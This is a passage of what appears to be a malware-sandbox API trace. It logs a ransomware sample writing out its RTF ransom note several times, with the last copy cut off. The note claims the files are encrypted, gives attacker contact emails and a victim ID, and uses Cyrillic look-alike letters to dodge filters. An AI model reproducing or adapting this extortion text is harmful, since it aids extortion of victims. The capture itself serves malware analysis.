;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 